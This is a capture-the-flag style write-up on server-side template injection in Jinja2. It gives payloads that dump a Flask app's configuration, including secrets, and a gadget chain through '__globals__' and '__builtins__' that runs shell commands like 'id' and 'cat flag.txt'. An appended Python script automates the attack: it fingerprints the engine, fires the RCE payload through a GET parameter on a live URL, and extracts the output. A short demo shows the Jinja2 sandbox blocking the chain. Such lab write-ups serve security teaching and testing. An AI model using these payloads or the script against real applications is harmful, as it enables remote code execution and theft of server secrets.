Exploiting SSTI - Jinja2
Exploit the SSTI vulnerability to obtain RCE and read the flag.
In this exercise we already assume that the web application uses the Jinja2 template engine (for instance via Flask's render_template_string with user input pasted into the template).

Let's first try to dump the web application configuration with the following payload. In a Flask application, config is the app configuration object that Flask injects into every template context, so this both confirms that our input is evaluated as a template and may leak secrets such as SECRET_KEY or database credentials:
{{ config.items() }}

The payload worked: the configuration was rendered straight into the response. Now let's try to obtain Remote Code Execution (RCE) with the following payload. It starts from self (the template's TemplateReference object), reaches the jinja2.runtime module namespace through self.__init__.__globals__, picks __builtins__ out of it (Jinja falls back to item lookup when attribute lookup fails, so the dict key is reached with dot syntax), imports os and runs a command:
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

And it worked: the output of id is reflected in the response, so commands run with the privileges of the web server process.
After a few tries (the path handed to popen is relative to the working directory of that process, so a quick ls helps to locate the file) we end up with the following payload to retrieve our flag:
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read() }}

And we found the flag!
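As an added example that is not part of the original write-up, the script below turns the steps above into a small probe: it fingerprints the engine (Twig also renders {{7*7}} as 49, but only Jinja2 repeats the string for {{7*'7'}}), wraps the page's gadget chain in markers so the command output can be cut out of the surrounding HTML, and only fires the RCE payload once the fingerprint matches. The injection point (one GET parameter), the target URL and the marker strings are assumptions; the local demo at the bottom needs the jinja2 package and also shows that SandboxedEnvironment refuses the underscore-prefixed attributes the chain depends on.

```python
# Added example: a Jinja2 SSTI probe built around the payloads used on this
# page. Not part of the original write-up; URL, parameter name and markers are
# assumptions for illustration only.
import re
import urllib.parse
import urllib.request

# Markers wrapped around the command output so it can be extracted from the
# response regardless of where the template is reflected.
MARK_L, MARK_R = "SSTI[[", "]]SSTI"

# Probes that separate Jinja2 from look-alike engines: Twig evaluates 7*'7'
# numerically (49), Jinja2 keeps Python semantics and repeats the string.
FINGERPRINT = {"{{7*7}}": "49", "{{7*'7'}}": "7777777"}


def is_jinja2(render):
    """render(template_str) -> response body. True only if every probe matches."""
    return all(expected in render(probe) for probe, expected in FINGERPRINT.items())


def rce_payload(cmd):
    """The page's gadget chain with the command output wrapped in markers.

    self -> TemplateReference; __init__.__globals__ is the jinja2.runtime module
    namespace; its __builtins__ dict is reached through Jinja's attribute-to-item
    fallback; __import__('os').popen(cmd).read() returns the command's stdout.
    """
    if "'" in cmd or "\\" in cmd:
        raise ValueError("keep quotes/backslashes out of cmd; drop a script instead")
    gadget = ("self.__init__.__globals__.__builtins__"
              f".__import__('os').popen('{cmd}').read()")
    return f"{{{{ '{MARK_L}' }}}}{{{{ {gadget} }}}}{{{{ '{MARK_R}' }}}}"


def extract_output(body):
    """Return the text between the markers, or None if the payload did not render."""
    m = re.search(re.escape(MARK_L) + r"(.*?)" + re.escape(MARK_R), body, re.DOTALL)
    return m.group(1) if m else None


def make_get_renderer(url, param):
    """Build a render() that reflects a template through one GET parameter
    (assumed injection point; adapt for POST bodies or headers as needed)."""
    def render(template):
        qs = urllib.parse.urlencode({param: template})
        with urllib.request.urlopen(f"{url}?{qs}", timeout=10) as resp:
            return resp.read().decode(errors="replace")
    return render


def exploit(render, cmd):
    """Fingerprint first, then run cmd and return its stdout (None on failure)."""
    if not is_jinja2(render):
        return None
    return extract_output(render(rce_payload(cmd)))


if __name__ == "__main__":
    # Offline demo against locally rendered templates; requires the jinja2 package.
    try:
        import jinja2
        from jinja2.sandbox import SandboxedEnvironment
    except ImportError:
        raise SystemExit("pip install jinja2 to run the local demo")

    # Vulnerable form: user input becomes the template, default environment.
    vulnerable = lambda t: jinja2.Environment().from_string(t).render()
    print("jinja2 detected:", is_jinja2(vulnerable))
    print("id ->", exploit(vulnerable, "id"))

    # Hardened form: the sandbox marks underscore-prefixed attributes such as
    # __init__ and __globals__ unsafe, so the same chain raises SecurityError.
    sandboxed = lambda t: SandboxedEnvironment().from_string(t).render()
    try:
        sandboxed(rce_payload("id"))
    except jinja2.exceptions.SecurityError as e:
        print("sandbox blocked it:", e)
```

Against a live target, exploit(make_get_renderer("http://target/page", "name"), "cat flag.txt") returns the file contents or None; the sandboxed branch of the demo is the fix to recommend in the report, together with never building templates from user input in the first place.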